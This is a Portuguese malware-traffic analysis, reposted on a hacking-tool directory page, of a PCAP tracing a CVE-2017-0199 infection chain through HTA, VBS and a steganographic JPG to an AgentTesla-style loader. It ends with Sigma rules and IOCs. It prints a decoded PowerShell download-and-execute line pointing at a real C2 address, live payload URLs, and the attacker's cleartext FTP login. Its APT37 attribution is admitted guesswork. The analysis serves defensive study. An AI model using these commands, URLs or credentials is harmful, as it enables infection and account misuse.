Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
XLS-to-DBatLoader-or-GuLoader-for-AgentTesla-variant — CVE-2017-0199 XLS --> HTA --> VBS --> ESTEGANOGRAFIA --> MALWARE DO TIPO DBATLOADER/GULOADER | Kitploit
Ferramentas/GitHubGitHub/blackoclock/xls-to-dbatloader-or-guloader-for-agenttesla-variant
ExploraçãoForensia de RedeEsteganografiaAnálise de MalwareForensia DigitalComando e ControleInteligência de Ameaças
GitHubblackoclock/xls-to-dbatloader-or-guloader-for-agenttesla-variant

XLS-to-DBatLoader-or-GuLoader-for-AgentTesla-variant

CVE-2017-0199 XLS --> HTA --> VBS --> ESTEGANOGRAFIA --> MALWARE DO TIPO DBATLOADER/GULOADER

Ver Repositório
7há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

O ARQUIVO ANALISADO

Análise Baseada em PCAP | Data: 2025-03-12 | Autor: BlackOclock

ÍNDICE

1. VISÃO GERAL DA ANÁLISE

  • 1.1 O Arquivo Analisado (Apenas PCAP)
  • 1.2 Linha do Tempo da Infecção & Mapeamento CVE

2. ANÁLISE DO TRÁFEGO DE REDE

  • 2.1 Hierarquia de Protocolos – Visão Geral
  • 2.2 Conversas – Principais Comunicadores & Transferência de Dados
  • 2.3 Endpoints – Confirmação Tx/Rx
  • 2.4 Objetos de Exportação HTTP – Arquivos Extraídos
  • 2.5 Filtro HTTP Contains – Verificação de Esteganografia

3. ANÁLISE COM NETWORKMINER

  • 3.1 Visão Geral dos Arquivos Extraídos
  • 3.2 Detalhes dos Arquivos (HTA, VBS, TXT)
  • 3.3 Impressões Digitais JA3 / JA3S / JA4
  • 4. ANÁLISE DE LOGS ZEEK (ZUI)

    • 4.1 Confirmação da Extração de Arquivos
    • 4.2 Hashes MD5/SHA1 & Timestamps
    • 4.3 Integração com VirusTotal

    5. ARQUIVOS EXTRAÍDOS & ANÁLISE ESTÁTICA

    6. TRIAGEM & ANÁLISE COMPORTAMENTAL

    • 6.1 Triagem HTA – Execução de mshta.exe
    • 6.2 Triagem VBS – WScript.exe & PowerShell
    • 6.3 Triagem TXT – Notepad.exe & Comportamento de Ransomware

    7. ANÁLISE DE INJEÇÃO DE PROCESSOS

    • 7.1 Árvore de Processos – mshta → cmd → powershell → csc → Notepad
    • 7.2 Eventos de WriteProcessMemory
    • 7.3 Manipulação de Token (SeDebugPrivilege)

    8. ANÁLISE DE DUMP DE MEMÓRIA

    • 8.1 Dumps de Memória do PowerShell (HTA) (PID 4424)
    • 8.2 Dump de Memória do comonstraints.vbs (PID 1184)

    9. DETECÇÃO E FINGERPRINT DE C2

    • 9.1 Análise Jarm / JA4
    • 9.2 Pivotagem GreyNoise & Shodan & Mapeamento da Infraestrutura C2

    10. ANÁLISE DE EXFILTRAÇÃO

    • 10.1 Tráfego FTP – 89.39.83.184
    • 10.2 Credenciais Roubadas & Listas de Contatos

    11. COMPORTAMENTO DO RANSOMWARE

    • 11.1 Execução do foeMMBIG.txt
    • 11.2 Notepad.exe como Alvo de Injeção

    12. INTELIGÊNCIA DE AMEAÇAS

    • 12.1 Resultados do VirusTotal & MalwareBazaar
    • 12.2 Mapeamento MITRE ATT&CK
    • 12.3 Correlação com APT37 (ScarCruft)

    13. ENGENHARIA DE DETECÇÃO

    • 13.1 Regras Sigma

    14. CONCLUSÃO & IOCs

    • 14.1 Resumo Completo da Cadeia de Ataque

    • 14.2 Indicadores de Comprometimento (IPs, Hashes, Domínios)

    • 14.3 Recomendações

      root@kitploit:~
                                           NOTA!!! Nesta análise, foi utilizado 'APENAS' o arquivo PCAP! Os arquivos ZIP não foram necessários;
      

    ##1. VISÃO GERAL DA ANÁLISE

    Arquivos de Origem do Malware-Traffic-Analysis.net

    Figura 1: arquivos de origem baixados em malware-traffic-analysis.net - foi utilizado 'APENAS' o arquivo PCAP

    2025-01-09 (QUINTA-FEIRA): CVE-2017-0199 XLS --> HTA --> VBS --> ESTEGANOGRAFIA --> MALWARE ESTILO DBATLOADER/GULOADER

    ##2. ANÁLISE DO TRÁFEGO DE REDE

    2.1-Hierarquia de Protocolos – Visão Geral

    Hierarquia de Protocolos

    Comecei com a Hierarquia de Protocolos para obter uma visão geral do tráfego. Isso mostra o volume de cada protocolo utilizado. Conforme mostrado na figura, o TLS representa 82,4% de todo o tráfego. Além disso, também estão presentes dados de Media Line e Line-Based. No entanto, para entender melhor a atividade de rede, precisamos examinar Conversas e Endpoints.

    2.2-Conversas – Principais Comunicadores & Transferência de Dados

    Conversas

    Usamos Conversas para detectar pares de IP que têm a maior transferência de dados entre si. A análise mostra que 10.9.1.101 (host) e 104.17.201.1 têm o maior volume de tráfego. As portas 80 e 443 foram usadas para essa transferência de dados. Além disso, vemos que 3 MB de dados foram transferidos para 10.9.1.101 (host) a partir de 104.17.201.1. Outra descoberta crítica é a conexão na porta 21 devido à conexão do IP WAN (89.39.83.184), o que sugere possível exfiltração. Mas ainda não temos certeza, pois ainda não sabemos sobre isso. Precisamos de uma prova!

    2.3- Endpoints

    Endpoints

    Usamos Endpoints para identificar os principais comunicadores na rede. 104.17.201.1 tem 3MB de dados transmitidos (Tx) e também 10.9.1.101 tem 3MB de dados recebidos (Rx). Além disso, os principais comunicadores são 104.17.201.1 como origem e 10.9.1.101 como destino.

    2.4- Objetos de Exportação HTTP

    Exportar

    A Exportação é usada para identificar arquivos, dados, e-mails, etc. transferidos pela rede. Sempre que analisamos um pcap, devemos verificar aqui para ver quais pacotes contêm quais dados. Bem, observamos os pacotes 88, 132, 2457 e 2468.

    2.5- Filtro HTTP Contains

    Exportar

    Se houver protocolos HTTP na rede. Devemos verificar png, zip, jpg, jpeg (Esteganografia) como mídia no filtro, pois os atacantes costumam usar códigos maliciosos em arquivos de mídia para contornar a detecção de antivírus.

    #Exemplo: http contains ".png" ou http contains ".jpg" ou http contains ".jpeg" ou http contains ".zip"

    Apenas estamos vendo por que esse filtro é importante quando a porta 80 é usada na rede. Aqui há um .hta que foi enviado em arquivos de mídia no pacote 47. Mas quando usamos a exportação para identificar arquivos, não havia.

    ##3. ANÁLISE COM NETWORKMINER

    • 3.1 Detalhes dos Arquivos (HTA, VBS, TXT)

    Networkminer

    Podemos usar o networkminer para identificar mais rapidamente no PCAP. Se você usa REMnux ou sistema Linux, pode escrever no terminal (networkminer pcap_name)

    Frame = 47 | Nome do arquivo = seemebestthingsevermeetgivenbestthingsfornewways | Extensão = .hta | Tamanho = 47 KB | IP de Origem = 192.3.27.144 Frame = 132 | Nome do arquivo = comonstraints | Extensão = .vbs | Tamanho = 223 KB | IP de Origem = 107.172.31.5 Frame = 2457 | Nome do arquivo = foeMMBIG | Extensão = .txt | Tamanho = 325 KB | IP de Origem = 107.172.31.5

    • 3.2 Impressões Digitais JA3 / JA3S / JA4

    Networkminer JA4/JA3

    Hashes JA3:

    • 06843d66057fc9cbe42e9d690308903 (Frame 8)
    • 62136a81b5b727d039d8160d188863aa (Frame 14)
    • 3c4eb72b882d4d1442c67ce73f1292a9 (Frame 140)

    Impressões Digitais JA4:

    • t13d1516h2_8daaf6152771_02713d6af862
    • t13d201000_2b729b4bf63_29829a46703f

    Bem, mas por que precisamos dos hashes JA4 e JA3? Pode surgir a pergunta: o que são JA3 e JA4?

    Deixe-me explicar; JA3 e JA4 são técnicas usadas para fingerprint de clientes e servidores TLS com base nos parâmetros do handshake TLS. O JA3 cria um hash MD5 do pacote client hello do handshake TLS, identificando exclusivamente o aplicativo cliente (ex.: navegador, malware).

    JA4 é uma técnica mais recente. É como uma impressão digital para o tráfego da internet. Assim como os humanos têm impressões digitais únicas, todo software que se conecta à internet deixa uma marca única. Mais útil para encontrar servidores C2.

    ##4. ANÁLISE DE LOGS ZEEK (ZUI)

    • 4.1 Confirmação da Extração de Arquivos, Hashes MD5/SHA1 & Timestamps, Integração com VirusTotal

    Logs do Zeek foram usados para verificar os arquivos extraídos do tráfego HTTP. O files.log mostra as seguintes entradas:

    Esses hashes foram posteriormente usados para consultas no VirusTotal.

    Resultado hta

    Hta (seemebestthing…)

    MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

    resultado vbs

    MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

    resultado foeMMBIG

    MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82

    ##5. ARQUIVOS EXTRAÍDOS & ANÁLISE ESTÁTICA

    Aqui vamos exportar todos os arquivos do pcap para a área de trabalho e analisaremos com o binwalk

    resultado foeMMBIG

    O arquivo HTA parece limpo. Não consegui encontrar nenhum dado oculto. Parece um arquivo de texto normal.

    O arquivo VBS é diferente. Encontrei duas coisas dentro:

    Alguns dados Base64 e um documento HTML Isso significa que o arquivo VBS possui várias camadas. O atacante tentou esconder código dentro dele.

    O arquivo TXT me deu uma saída estranha. Diz "Broadcom header", o que não faz sentido para um arquivo de texto. Talvez o arquivo esteja corrompido, ou haja outra camada dentro. Preciso executá-lo em um sandbox para entender mais

    ##6. TRIAGEM & ANÁLISE COMPORTAMENTAL

    • 6.1 Triagem HTA – Execução de mshta.exe

    Executei o arquivo HTA em um sandbox. Aqui está o que aconteceu:

    Triagem HTA

    Temos o resultado do hta. Pontuação 8/10 pelo Triage.

    Triagem HTA

    Cadeia de processos com 5 etapas: mshta.exe (PID 1080) iniciou Ele lançou cmd.exe (4952) cmd.exe lançou powershell.exe (4424) PowerShell habilitou SeDebugPrivilege (para acessar outros processos) WriteProcessMemory foi usado várias vezes para injeção de código

    Cadeia de injeção:

    mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → processo desconhecido (3332)

    PowerShell também verificou processos em execução (descoberta) e consultou o idioma do sistema (provavelmente para evitar sandboxes).

    Técnicas MITRE que vi para hta :

    T1059.001 (PowerShell) T1059.003 (cmd) T1057 (descoberta de processos) T1134 (manipulação de token) T1055 (injeção de processo) T1614.001 (detecção de idioma)

    Triagem HTA

    bem, vemos aqui FromString64Base no comando PowerShell pelo cmd.exe. Temos que decodificá-lo no CyberChef para ver o código em base64.

    Triagem HTA

    No comando PowerShell, encontrei uma string Base64. Após decodificá-la com o CyberChef, vi isto:

    URLDownloadToFile(0, "http://107.172.31.5/comonstraints.vbs", "...", 0, 0) Start-Sleep(3) Invoke-Expression "..."

    então isso significa que, a partir de 107.172.31.5, baixar comonstraints.vbs e 3 segundos de espera e executar. Bem, no próximo passo, comonstraints.vbs será baixado.

    • 6.2 Triagem VBS – WScript.exe & PowerShell

    Triagem VBS

    Temos o resultado do vbs. Pontuação 10/10 pelo Triage.

    Cadeia de processos: Wscript.exe executou e lançou PowerShell.exe

    Bem, na imagem, se verificarmos os códigos no processo. Podemos ver #x#.GIBMMeof/5.13.271.701//:p##h ----> Há um caminho codificado. http://107.172.31.5/foeMMBIG.txt (que foi visto na exportação do PCAP)

    e também este site https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg, que contém código malicioso dentro do jpg. O JPG possui tags <BASE64_START> e <BASE64_END>. Entre elas, então significa que há código oculto. O texto oculto é na verdade Base64, mas escrito ao contrário. O script o inverte primeiro, depois o decodifica. Após a decodificação, ele se torna um pequeno programa (assembly .NET) e é executado no computador.

    Tentei baixar o jpg.

    Triagem VBS

    Mas não consegui obtê-lo. Talvez este endereço tenha sido fechado. O arquivo VBS baixa uma imagem, encontra código oculto dentro dela, corrige e o executa. Isso é chamado de esteganografia – ocultar coisas dentro de imagens.

    Técnicas MITRE:

    T1012 - Consulta ao Registro T1082 - Descoberta de Informações do Sistema T1055 - Injeção de Processo T1057 – Descoberta de Processos T1134 – Manipulação de Token de Acesso

    • 6.3 Triagem TXT – Notepad.exe & Comportamento de Ransomware

    Triagem TXT

    -O arquivo foi aberto com Notepad.exe (PID 4600)

    • O Notepad então injetou código em si mesmo (injeção de processo)
    • Arquivos na área de trabalho começaram a ser criptografados
    • Uma nota de resgate apareceu como txt

    Isso confirma que foeMMBIG.txt é na verdade um dropper de ransomware.

    Técnicas MITRE:

    • T1055 (Injeção de Processo)

    ##7. ANÁLISE DE INJEÇÃO DE PROCESSOS

    7.1 Árvore de Processos

    mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → Notepad.exe (4600)

    7.2 Eventos de WriteProcessMemory

    PID 1080 (mshta.exe) escreveu no PID 4952 (cmd.exe) PID 4952 (cmd.exe) escreveu no PID 4424 (powershell.exe) PID 4424 (powershell.exe) escreveu no PID 4432 (csc.exe) PID 4432 (csc.exe) escreveu no PID 3332 (desconhecido)

    7.3 Manipulação de Token

    PowerShell (PID 4424) habilitou SeDebugPrivilege, permitindo acessar outros processos.

    ##8. ANÁLISE DE DUMP DE MEMÓRIA

    • 8.1 Dumps de Memória do PowerShell (HTA) (PID 4424)

    Quando o malware foi executado, o sandbox tirou snapshots da memória do PowerShell (PID 4424). Esses snapshots salvam o que estava na RAM do computador naquele momento.

    Encontrei mais de 20 arquivos de dump de memória

    memória hta

    • 8.2 Dump de Memória do comonstraints.vbs (PID 1184)

    O arquivo VBS (executado pelo WScript.exe, PID 1184) também criou dumps de memória. Esses dumps têm em sua maioria 64 KB de tamanho. Isso é normal para pequenas alocações. Mas verifiquei se havia dumps de memória do Notepad.exe (PID 4600), mas não havia nenhum. Isso é interessante porque sabemos que o Notepad foi usado para abrir o foeMMBIG.txt.

    ##9. DETECÇÃO E FINGERPRINT DE C2

    • 9.1 Análise Jarm / JA4

    jarm

    Apenas Jarm foi impresso a partir de 2 IPs

    • 9.2 Pivotagem GreyNoise & Shodan & Mapeamento da Infraestrutura C2

    Extraí impressões digitais JA4 do NetworkMiner e as pesquisei no GreyNoise. Encontrei 26 IPs sinalizados como maliciosos com a mesma impressão digital JA4. Em seguida, pesquisei todos esses IPs no Shodan para verificar suas portas e serviços abertos.

    Esta lista foi criada verificando o GreyNoise, e esses IPs estão sinalizados como maliciosos no GreyNoise:

    • 34.122.147.229 ( Tentativas de brute-force de login em aplicações web - de acordo com a fonte Guardpot - 7 meses atrás Este IP esteve envolvido em 1222 eventos em 2 tipos distintos de ataque. Ataques: tcp-portscan (1177), fortinet-login (45). Primeira vez visto: 2024-05-07 23:10 UTC, Última vez visto: 2025-07-17 17:28 UTC. 3/94 fornecedores de segurança sinalizaram este endereço IP como malicioso. Not After: 2020-11-30 22:10:40 )

    • 107.189.1.175 - resultado do shodan C: Luxemburgo Org : Buy VM Portas Abertas: 80 / 443 / 9001 / 9030

    • 104.197.69.115 ( Tentativas de brute-force de login em aplicações web - de acordo com a fonte Guardpot - 5 meses atrás Este IP esteve envolvido em 1159 eventos em 2 tipos distintos de ataque. Ataques: tcp-portscan (1124), fortinet-login (35). Primeira vez visto: 2024-07-11 04:26 UTC, Última vez visto: 2025-09-25 12:08 UTC. 4/94 fornecedores de segurança sinalizaram este endereço IP como malicioso )

    • 34.72.176.129 ( Tentativas de brute-force de login em aplicações web - de acordo com a fonte Guardpot - 5 meses atrás Este IP esteve envolvido em 1233 eventos em 2 tipos distintos de ataque. Ataques: tcp-portscan (1201), fortinet-login (32). Primeira vez visto: 2024-07-11 04:26 UTC, Última vez visto: 2025-09-25 12:12 UTC. Encontre mais informações no CrowdSec CTI - de acordo com a fonte CrowdSec - 1 ano atrás Comportamentos: Tentativa de exploração / HTTP Bruteforce / HTTP Crawl + 2 mais. Detalhes completos no CrowdSec CTI
      6/94 fornecedores de segurança sinalizaram este endereço IP como malicioso

    • 34.123.170.104 ( Tentativas de brute-force de login em aplicações web - de acordo com a fonte Guardpot - 1 mês atrás Este IP esteve envolvido em 1141 eventos em 3 tipos distintos de ataque. Ataques: tcp-portscan (1097), fortinet-login (42), web-login (2). Primeira vez visto: 2024-05-23 14:07 UTC, Última vez visto: 2026-01-26 05:22 UTC. Encontre mais informações no CrowdSec CTI - de acordo com a fonte CrowdSec - 1 ano atrás Comportamentos: HTTP Crawl / HTTP DoS / HTTP Exploit + 1 mais. Detalhes completos no CrowdSec CTI ) 3/94 fornecedores de segurança sinalizaram este endereço IP como malicioso

    • 121.127.42.69 ( 3/94 fornecedores de segurança sinalizaram este endereço IP como malicioso)

    • 185.220.101.2 resultado do shodan ( Hostnames:berlin01.tor-exit.artikel10.org País : Alemanha Organização: Artikel10 e.V. ISP : Stiftung Erneuerbare Freiheit (É TOR) Portas : 80/443/9001/9002

    • 185.220.101.162 ( Hostnames: tor-exit-162.relayon.org País : Alemanha / Organização: CIA TRIAD SECURITY LLC ISP : Stiftung Erneuerbare Freiheit)

    • 205.169.39.24 Varredura de portas de rede e reconhecimento - de acordo com a fonte Guardpot - 8 meses atrás Este IP esteve envolvido em 86 eventos em 1 tipo distinto de ataque. Ataques: tcp-portscan (86). Primeira vez visto: 2024-08-22 22:29 UTC, Última vez visto: 2025-07-04 17:29 UTC.

    • 47.254.76.66 ( Provedor de Nuvem : Alibaba Cloud País : EUA portas abertas : 22 Sistema operacional : Linux

    • 47.251.118.89 (Provedor de Nuvem : Alibaba Cloud País : EUA portas abertas : 22 Sistema operacional : Linux)

    • 107.189.12.7( Hostnames : tor.privatebrowsing.org País Luxemburgo portas abertas: 80)

    • 47.88.18.245 ( País EUA SO: Linux porta aberta : 22)

    • 79.127.248.2 ( 4/94 fornecedores de segurança sinalizaram este endereço IP como malicioso País EUA)

    • 185.126.82.201( País : EUA porta : 1080)

    • 45.92.19.139 (País : EUA porta : 59511)

    • 47.251.186.126( País : EUA porta : 22)

    • 79.127.221.66 (País : EUA porta : 1080)

    • 185.241.208.136 ( País: Polônia Hostnames ns2.rdp.rs portas abertas : 111/8440/9001)

    • 47.89.246.29 ( País : EUA porta : 22)

    • 185.220.101.110 ( Hostnames: tor-exit-110.digitalcourage.de portas abertas : 80/123/443/8080)

    • 5.77.252.202 ( Hostnames :host-202.252.77.5.ucom.am País : Armênia portas abertas : 1701/8291)

    • 124.198.132.172(Tor) ( País : EUA portas abertas : 111/8110/9001)

    • 185.220.101.9 (Tor) ( HostName : berlin01.tor-exit.artikel10.org País : Polônia portas abertas : 80/443/9001/9002)

    • 213.230.93.13 ( 4/94 fornecedores de segurança sinalizaram este endereço IP como malicioso País : Uzbequistão)

    • 138.199.140.203 ( hostname :static.203.140.199.138.clients.your-server.de País : Alemanha Portas Abertas : 22 / 8080 / 8443 / 9090/ 9100 / 10000 / 10250)

    ##10. ANÁLISE DE EXFILTRAÇÃO

    • 10.1 Tráfego FTP – 89.39.83.184

    Quando verificamos 89.39.83.184, vemos que este ip se conectou na porta 21 com o host. Se clicarmos em um dos pacotes no ftp 21 e Follow --- > TCP STREAM, vemos o e-mail e a senha do atacante

    Informações do Atacante

    • 10.2 Credenciais Roubadas & Listas de Contatos

    quando verificamos os arquivos no networkminer, havia os números de pacote 2498 (PW_user1_DESKTOP.html) e 2516 (Contacts_Thunder.txt). Após exportar esses arquivos, há informações de nome de usuário e senha para ataque de phishing (acho eu) ou roubo de contas.

    Informações do Atacante

    Pesquisei o IP do servidor FTP (89.39.83.184) no Shodan para aprender mais sobre a infraestrutura do atacante.

    Informações do Atacante

    ##12. INTELIGÊNCIA DE AMEAÇAS

    12.1 Resultados do VirusTotal & MalwareBazaar

    Os hashes obtidos dos logs do Zeek (Seção 4) foram verificados no VirusTotal e no MalwareBazaar. Todos os arquivos foram confirmados como maliciosos:

    Arquivo HTA: 33/61 detecção, identificado como AgentTesla Arquivo VBS: 31/62 detecção, identificado como AgentTesla / Talu Arquivo TXT: 25/62 detecção, identificado como Zapchast / Bhgd (dropper de ransomware)

    Veja a Seção 14.2 para a lista completa de hashes.

    12.2 Mapeamento MITRE ATT&CK

    T1059.001 - PowerShell T1059.003 - cmd T1134 - manipulação de token T1614.001 - detecção de idioma T1012 - Consulta ao Registro T1082 - Descoberta de Informações do Sistema T1055 - Injeção de Processo T1057 – Descoberta de Processos

    12.3 Correlação com APT37 (ScarCruft)

    Por que este ataque se parece com APT37?

    O que vimos neste ataque - APT37 é conhecido por Arquivo HTA usado para iniciar a infecção - APT37 usa muito arquivos HTA PowerShell com comandos base64 - APT37 adora PowerShell Esteganografia (JPG com código oculto) - APT37 esconde código em imagens Injeção de processo (mshta → cmd → powershell → csc) - APT37 injeta código em processos confiáveis Exfiltração por FTP de dados roubados - APT37 rouba credenciais e arquivos Ransomware no final - APT37 agora também usa ransomware Alvos talvez na Europa - APT37 está ativo na Europa Conclusão As técnicas que vimos neste ataque correspondem ao que a APT37 costuma fazer. Não é 100% prova, mas parece APT37. Provavelmente um grupo hacker norte-coreano está por trás disso.

    ##13. ENGENHARIA DE DETECÇÃO

    • 13.1 Regras Sigma

    title: SeDebugPrivilege no PowerShell description: Detecta PowerShell habilitando SeDebugPrivilege (possível manipulação de token) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains: 'SeDebugPrivilege' condition: selection

    title: Exfiltração via FTP description: Detecta conexões FTP a partir de processos que não deveriam usar FTP logsource: category: network_connection product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\cmd.exe' - '\wscript.exe' DestinationPort: 21 condition: selectiontitle: Download do PowerShell description: Detecta o PowerShell baixando arquivos da internet logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains|all: - 'URLDownloadToFile' - 'http' condition: selection

    title: Notepad a partir de Temp description: Detecta o Notepad abrindo arquivos da pasta Temp (possível injeção de processo) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\notepad.exe' CommandLine|contains: '\Temp' condition: selection

    NOTA! Eu sei que isso é básico, mas estou apenas tentando aprender regras Sigma.

    ##14. CONCLUSÃO E IOCs

    14.1 Resumo da Cadeia de Ataque Completa

    A infecção começou com um arquivo HTA malicioso baixado de 192.3.27.144. Quando aberto, iniciou uma cadeia de processos:

    mshta.exe → cmd.exe → powershell.exe → csc.exe → Notepad.exe

    Principais descobertas:

    • O PowerShell habilitou SeDebugPrivilege e usou WriteProcessMemory para injeção de código O arquivo VBS baixou um JPG do Cloudinary. O JPG continha dados Base64 ocultos entre as tags <BASE64_START> e <BASE64_END>. O script extraiu esses dados, reverteu-os e decodificou-os em um assembly .NET. Este assembly foi carregado na memória e executado. Embora não tenhamos conseguido baixar o JPG (erro 401), o código sugere fortemente que este foi o mecanismo que baixou o payload final (foeMMBIG.txt).

    Ator da ameaça: APT37 – técnicas correspondem a TTPs conhecidas

    14.2 Indicadores de Compromisso

    Endereços IP:

    IP = 107.172.31.5 | Função = Servidor C2 (VBS, download TXT) IP = 89.39.83.184 | Função = Servidor de exfiltração FTP IP = 192.3.27.144 | Função = Fonte de download do HTA IP = 104.17.201.1 | Função = Download do primeiro estágio (3 MB) 25 IPs maliciosos do GreyNoise | Ver lista completa na Seção 9.2

    Domínios:

    Domínio = res.cloudinary.com Função= Esteganografia (JPG com código oculto) Domínio = ip-api.com Nome do arquivo= index.B23BDC8E.txt(false) Função = Evasão de sandbox

    Hashes de Arquivos:

    (seemebestbest…).hta MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

    comostraints.vbs MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

    foeMMBIG.txt MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82

    Credenciais FTP:

    • Nome de usuário: [email protected]
    • Senha: e)rwKbkKP8-m0

    14.3 Recomendações

    • Bloqueie todos os IPs e domínios listados na seção de IOCs
    • Monitore as impressões digitais JA3/JA4 para detectar infraestrutura C2 semelhante
    • Use regras Sigma (veja Seção 13) no seu SIEM
    • Treine usuários sobre ataques de phishing que entregam arquivos HTA
    • Habilite o registro do PowerShell e monitore o uso de SeDebugPrivilege
    • Isole e investigue qualquer host com padrões semelhantes de injeção de processo
    Baixar ferramenta